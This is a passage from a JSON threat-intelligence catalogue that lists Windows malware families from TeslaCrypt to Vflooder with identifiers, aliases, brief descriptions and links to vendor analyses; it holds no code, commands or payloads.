"synonyms": [ "cryptesla" ], "type": [] }, "uuid": 
"bd79d5be-5c2f-45c1-ac99-0e755a61abad", "value": "TeslaCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos", "https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market" ], "synonyms": [ "Alphabot" ], "type": [] }, "uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25", "value": "Thanatos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom", "https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html", "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/", "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/" ], "synonyms": [], "type": [] }, "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", "value": "Thanatos Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte", "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" ], "synonyms": [], "type": [] }, "uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4", "value": "ThreeByte" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief", "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" ], "synonyms": [], "type": [] }, "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", "value": "ThumbThief" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker" ], "synonyms": [], "type": [] }, "uuid": "e55dcdec-0365-4ee0-96f8-7021183845a3", "value": "Thunker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", 
"http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/" ], "synonyms": [], "type": [] }, "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca", "value": "Tidepool" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba", "https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/", "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/", "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", "http://contagiodump.blogspot.com/2012/06/amazon.html", "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", "http://garage4hackers.com/entry.php?b=3086", "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/" ], "synonyms": [ "Illi", "TinyBanker", "Zusy" ], "type": [] }, "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88", "value": "Tinba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0", "https://www.proofpoint.com/us/threat-insight/post/abaddonpos-now-targeting-specific-pos-software" ], "synonyms": [], "type": [] }, "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", "value": "TinyLoader" }, { "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. 
The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking websites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on GitHub. XBot is an offspring of TinyNuke and very similar to its ancestor.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596", "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", "https://krebsonsecurity.com/tag/nuclear-bot/", "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/" ], "synonyms": [ "MicroBankingTrojan", "Nuclear Bot", "NukeBot", "Xbot" ], "type": [] }, "uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838", "value": "TinyNuke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c", "value": "TinyTyphon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": 
"b933634f-81d0-41ef-bf2f-ea646fc9e59c", "value": "TinyZbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop" ], "synonyms": [], "type": [] }, "uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8", "value": "Tiop" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee", "https://www.cert.pl/en/news/single/tofsee-en/", "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/", "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/" ], "synonyms": [ "Gheg" ], "type": [] }, "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", "value": "Tofsee" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker", "http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/", "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/" ], "synonyms": [], "type": [] }, "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", "value": "TorrentLocker" }, { "description": "tRat is a modular RAT written in Delphi and has appeared in campaigns in September and October of 2018.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trat", "https://www.proofpoint.com/us/threat-insight/post/trat-new-modular-rat-appears-multiple-email-campaigns" ], "synonyms": [], "type": [] }, "uuid": "b9e6e4bd-57e8-44e7-853c-8dcb83c26079", "value": "tRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter", "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html", "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/", "http://adelmas.com/blog/treasurehunter.php" ], "synonyms": [ "huntpos" ], "type": [] }, "uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2", "value": "TreasureHunter" }, { "description": "A 
financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in the wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Uses XMRig (Monero) miner\r\nFeb 2018 - Bitcoin theft\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Macro Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Macro enabled > Trickbot installed", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module", "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", "https://www.youtube.com/watch?v=KMcSAlS9zGE", "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", 
"https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", "http://www.malware-traffic-analysis.net/2018/02/01/", "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features", "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core", "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", "https://www.youtube.com/watch?v=EdchPEHnohw", "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html", 
"https://www.youtube.com/watch?v=lTywPmZEU1A", "https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer", "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/" ], "synonyms": [ "TheTrick", "TrickLoader", "Trickster" ], "type": [] }, "uuid": "c824813c-9c79-4917-829a-af72529e8329", "value": "TrickBot" }, { "description": "Malware targeting Triconex Safety Instrumented System (SIS) controllers, which are commonly used in Industrial Control Systems (ICS).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", "https://dragos.com/blog/trisis/TRISIS-01.pdf" ], "synonyms": [ "HatMan", "Trisis" ], "type": [] }, "uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15", "value": "Triton" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", "https://github.com/5loyd/trochilus/", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" ], "synonyms": [], "type": [] }, "uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e", "value": "Trochilus RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/", "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/" 
], "synonyms": [ "Shade" ], "type": [] }, "uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126", "value": "Troldesh" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom" ], "synonyms": [], "type": [] }, "uuid": "48deadcc-1a67-442d-b181-fdaaa337c4bb", "value": "Trump Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri" ], "synonyms": [], "type": [] }, "uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833", "value": "Tsifiri" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" ], "synonyms": [], "type": [] }, "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf", "value": "TURNEDUP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin", "https://www.lastline.com/labsblog/tyupkin-atm-malware/" ], "synonyms": [], "type": [] }, "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c", "value": "Tyupkin" }, { "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. 
Typically, components of this tool are stripped out and reused by malicious actors.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme", "https://github.com/hfiref0x/UACME" ], "synonyms": [ "Akagi" ], "type": [] }, "uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371", "value": "UACMe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos", "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html", "https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns" ], "synonyms": [], "type": [] }, "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", "value": "UDPoS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix", "https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue" ], "synonyms": [], "type": [] }, "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd", "value": "Uiwix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001" ], "synonyms": [], "type": [] }, "uuid": "72961adc-ace1-4593-99f1-266119ddeccb", "value": "Unidentified 001" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003" ], "synonyms": [], "type": [] }, "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1", "value": "Unidentified 003" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_005" ], "synonyms": [], "type": [] }, "uuid": "ff80f82d-2556-4cda-8cf2-aa6b21d59dc9", "value": "win.unidentified_005" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006" ], "synonyms": [], "type": [] }, "uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6", "value": "Unidentified 006" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware", "http://blog.talosintelligence.com/2017/02/korean-maldoc.html" ], "synonyms": [], "type": [] }, "uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956", "value": "Unidentified 013 (Korean)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7", "https://wikileaks.org/ciav7p1/cms/page_34308128.html" ], "synonyms": [], "type": [] }, "uuid": "40c66571-164c-4050-9c84-f37c9cd84055", "value": "Unidentified 020 (Vault7)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom" ], "synonyms": [], "type": [] }, "uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f", "value": "Unidentified 022 (Ransom)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023" ], "synonyms": [], "type": [] }, "uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b", "value": "Unidentified 023" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom", "https://twitter.com/malwrhunterteam/status/789161704106127360" ], "synonyms": [], "type": [] }, "uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b", "value": "Unidentified 024 (Ransomware)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud", "http://malware-traffic-analysis.net/2016/05/09/index.html" ], "synonyms": [], "type": [] }, "uuid": "f43a0e38-2394-4538-a123-4a0457096058", "value": "Unidentified 025 (Clickfraud)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028" ], "synonyms": [], "type": [] }, "uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b", "value": "Unidentified 028" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029" ], 
"synonyms": [], "type": [] }, "uuid": "aff47054-7130-48ca-aa2c-247bdf44f180", "value": "Unidentified 029" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030", "https://twitter.com/JaromirHorejsi/status/877811773826641920" ], "synonyms": [], "type": [] }, "uuid": "7287a0b0-b943-4007-952f-07b9475ec184", "value": "Filecoder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031" ], "synonyms": [], "type": [] }, "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e", "value": "Unidentified 031" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_032", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" ], "synonyms": [], "type": [] }, "uuid": "799921d7-48e8-47a6-989e-487b527af37a", "value": "Unidentified 032" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_033" ], "synonyms": [], "type": [] }, "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", "value": "Unidentified 033" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_035" ], "synonyms": [], "type": [] }, "uuid": "ba014661-d1d4-4a69-a698-9f4120de9260", "value": "Unidentified 035" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037" ], "synonyms": [], "type": [] }, "uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2", "value": "Unidentified 037" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038" ], "synonyms": [], "type": [] }, "uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58", "value": "Unidentified 038" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039" ], "synonyms": [], "type": [] }, "uuid": 
"97c1524a-c052-49d1-8770-14b513d8a830", "value": "Unidentified 039" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041" ], "synonyms": [], "type": [] }, "uuid": "88d70171-fc89-44d1-8931-035c0b095247", "value": "Unidentified 041" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042", "http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/" ], "synonyms": [], "type": [] }, "uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757", "value": "Unidentified 042" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044" ], "synonyms": [], "type": [] }, "uuid": "df9c8440-b4da-4226-b982-e510d06cf246", "value": "Unidentified 044" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045" ], "synonyms": [], "type": [] }, "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", "value": "Unidentified 045" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_046", "https://twitter.com/DrunkBinary/status/1006534471687004160" ], "synonyms": [], "type": [] }, "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f", "value": "Unidentified 046" }, { "description": "RAT written in Delphi used by Patchwork APT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047", "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" ], "synonyms": [], "type": [] }, "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", "value": "Unidentified 047" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_048", "https://twitter.com/DrunkBinary/status/1002587521073721346" ], "synonyms": [], "type": [] }, "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f", "value": "Unidentified 048 
(Lazarus?)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_049", "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" ], "synonyms": [], "type": [] }, "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb", "value": "Unidentified 049 (Lazarus/RAT)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_051", "https://twitter.com/CDA/status/1014144988454772736" ], "synonyms": [], "type": [] }, "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", "value": "Unidentified 051" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052" ], "synonyms": [], "type": [] }, "uuid": "80c12fcd-e5ef-4549-860d-7928363022f9", "value": "Unidentified 052" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053", "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" ], "synonyms": [], "type": [] }, "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", "value": "Unidentified 053 (Wonknu?)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unlock92", "https://twitter.com/struppigel/status/810753660737073153", "https://twitter.com/bartblaze/status/976188821078462465" ], "synonyms": [], "type": [] }, "uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6", "value": "Unlock92" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas", "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html", "https://twitter.com/ulexec/status/1005096227741020160", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/" ], "synonyms": [ "Rombrast" ], "type": [] }, "uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd", "value": "UPAS" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre", "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", "https://secrary.com/ReversingMalware/Upatre/" ], "synonyms": [], "type": [] }, "uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0", "value": "Upatre" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy" ], "synonyms": [], "type": [] }, "uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7", "value": "Urausy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone", "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/", "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" ], "synonyms": [ "Bebloh", "Shiotob" ], "type": [] }, "uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe", "value": "UrlZone" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos", "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken", "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", 
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3193&sid=9fe4a57263c91a8b18bc43ae23afc453", "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots", "https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg", "https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/" ], "synonyms": [ "Snake" ], "type": [] }, "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", "value": "Uroburos (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" ], "synonyms": [ "Catch", "NeverQuest", "grabnew" ], "type": [] }, "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", "value": "Vawtrak" }, { "description": "Ransomware that appears to require manual installation (believed to be via RDP). Encrypts files with the .velso extension. 
", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.velso", "https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/" ], "synonyms": [], "type": [] }, "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", "value": "Velso Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker", "https://twitter.com/JaromirHorejsi/status/813690129088937984" ], "synonyms": [], "type": [] }, "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd", "value": "Venus Locker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" ], "synonyms": [], "type": [] }, "uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1", "value": "Vermin" }, { "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services is negligible, but for researchers it can be a nuisance. 
